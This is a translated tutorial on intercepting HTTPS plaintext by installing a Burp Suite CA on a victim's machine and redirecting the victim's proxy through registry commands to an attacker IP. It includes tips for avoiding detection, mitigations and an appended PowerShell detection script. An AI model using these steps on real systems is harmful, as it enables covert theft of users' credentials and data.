Man-in-the-middle attack hijacking HTTPS plaintext data

Source: Internet
Author: User
Tags: ssl certificate

Secure transmission of sensitive data is an important part of network security, and most people regard HTTPS as the best practice, whatever the price of an SSL certificate. HTTPS is not absolutely secure, however: a man-in-the-middle hijacking attack can still obtain the transmitted plaintext data. For the attack principle, see "HTTPS connection process and man-in-the-middle attack hijacking". That article also points out that a man-in-the-middle attack requires the client to trust the middleman's certificate, otherwise the attack fails. This makes the attack difficult and inconvenient to carry out, but it does not mean it cannot be achieved. In my opinion there are at least two ways to make use of it:
First, after obtaining Remote Desktop logon permission on the server, set the client to trust the middleman's certificate.
Second, use physical access: get hold of the victim's computer and set the client to trust the man-in-the-middle certificate.

1.1.1 Setting up the client to trust the middleman certificate

Here we use Burp Suite as the middleman to carry out an HTTPS hijacking attack. First, the client (the victim's computer) must trust the Burp Suite certificate, that is, the Burp Suite CA certificate must be installed; the procedure is described in the official Burp Suite configuration documentation.

1.1.2 Attack conditions

On reflection, we find that this technique currently has certain limitations in practice, so let us look at its shortcomings. The attack conditions mainly involve the following:
First, the server needs to be a Windows host.
Second, the attacker needs a separate external network host (or a host on the same LAN).
Third, the attacker needs Remote Desktop control of the server, or temporary access to the victim's computer.
To explain the third condition briefly: Remote Desktop control of the server does not by itself give access to the application's sensitive data or to the data in the database. For example, suppose you find a command execution vulnerability on a site that only has a login page; you can execute commands, but the permissions are not very high (and even with high permissions, the sensitive application data may still be out of reach). Unless you are only interested in controlling the server and not in the sensitive data in the application, this attack mode can be used here.

1.1.3 Introduction to the experimental environment

Operating system: Microsoft Windows Server R2 Enterprise, IP: 192.168.1.25
User rights group: users
Tool used: Burp Suite
Attacker IP: 192.168.1.200

1.1.4 Configuring the attacker's Burp Suite

Since we want to capture the packets sent by the victim, and the victim is usually on an intranet whose external access is provided by port mapping, we configure our Burp Suite proxy listener to accept packets from any IP, as shown in the screenshot.

1.1.5 Setting the victim's IE proxy

If you can reach the desktop environment, you can set the IE proxy through the graphical interface, as shown in the screenshot.

If you cannot reach the Remote Desktop, the IE proxy can be set with the following commands.

Enable the proxy:
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f

Set the proxy IP and port; these must match the attacker's IP and the port configured in Burp Suite:
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "192.168.1.200:8080" /f

The proxy can be turned off again with the following command:
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f

The above commands were tested and can be executed successfully by a member of the users group alone, as shown in the screenshot. For convenience, we write the enable and disable commands as .bat batch files.

1.1.6 Obtaining the hijacked plaintext data

So as not to arouse the victim's suspicion, we do not turn on Burp Suite's intercept function, as shown in the screenshot.

Now the attacker only needs to wait for the victim to access the relevant website in the browser; even for an HTTPS site we can hijack the plaintext data, as shown in the screenshot.

1.1.7 Summary and repair suggestions

Furthermore, if the target is only an HTTP website, the above attack becomes much easier and the harm much greater, because the step of making the client trust the middleman certificate is no longer needed; the client only has to be pointed at the proxy. That can be done by spreading a tool that turns on the proxy through phishing, or simply by executing one command in a shell, for which ordinary user permissions are enough. Repair recommendations are as follows:
First, harden the server so that server vulnerabilities cannot be used to carry out the attack.
Second, configure the browser not to use the default system proxy (IE's global proxy).
Third, raise security awareness: remember to set a password lock screen when leaving the computer; when lending the computer to someone else, stay beside them if possible, and check for anything abnormal after they have finished.
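As an added defender-side check (not part of the original post), the following PowerShell script looks for the two footprints this attack leaves on a victim host: the per-user proxy values written by the REG ADD commands in 1.1.5, and a non-Microsoft root certificate (such as a Burp Suite CA) installed into a trusted root store as described in 1.1.1. The approved proxy list and the root CA thumbprint allow-list are assumed to be supplied by the operator; the empty values below are placeholders.

```powershell
# Added example: detect an unexpected WinINet proxy and unapproved root CAs.
# Both are what a local HTTPS man-in-the-middle setup needs on the victim.
$InternetSettings     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
$ApprovedProxies      = @()   # placeholder, e.g. @('proxy.corp.example:3128'); empty = none expected
$KnownRootThumbprints = @()   # placeholder: thumbprints of the organisation's own private CAs

$findings = @()

# 1. Proxy check: ProxyEnable = 1 plus a ProxyServer value means every
#    IE/WinINet client under this account is routed through that host.
$proxy = Get-ItemProperty -Path $InternetSettings -ErrorAction SilentlyContinue
if ($proxy -and $proxy.ProxyEnable -eq 1) {
    $server = [string]$proxy.ProxyServer
    if ($ApprovedProxies -notcontains $server) {
        $findings += "Unexpected user proxy enabled: '$server' (ProxyEnable=1 under HKCU)"
    }
}

# 2. Root store check: a self-signed certificate (Subject equals Issuer) that is
#    not a Microsoft root and not on the allow-list is a candidate MITM CA.
#    CurrentUser\Root is where a non-admin user can install one; LocalMachine\Root
#    is included for completeness.
foreach ($store in 'Cert:\CurrentUser\Root', 'Cert:\LocalMachine\Root') {
    Get-ChildItem -Path $store -ErrorAction SilentlyContinue |
        Where-Object {
            $_.Subject -eq $_.Issuer -and
            $_.Issuer -notmatch 'Microsoft' -and
            $KnownRootThumbprints -notcontains $_.Thumbprint
        } |
        ForEach-Object {
            $findings += "Unapproved root CA in ${store}: '$($_.Subject)' thumbprint $($_.Thumbprint), valid from $($_.NotBefore)"
        }
}

if ($findings.Count -eq 0) {
    Write-Output 'No MITM footprint found: no unexpected proxy, no unapproved root CA.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
    exit 1    # non-zero exit so a scheduled task or EDR script can alert on it
}
```

Run it under the account that would be affected (proxy settings and CurrentUser\Root are per user); a root CA that appears here with a NotBefore date matching a recent remote session is the strongest indicator.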
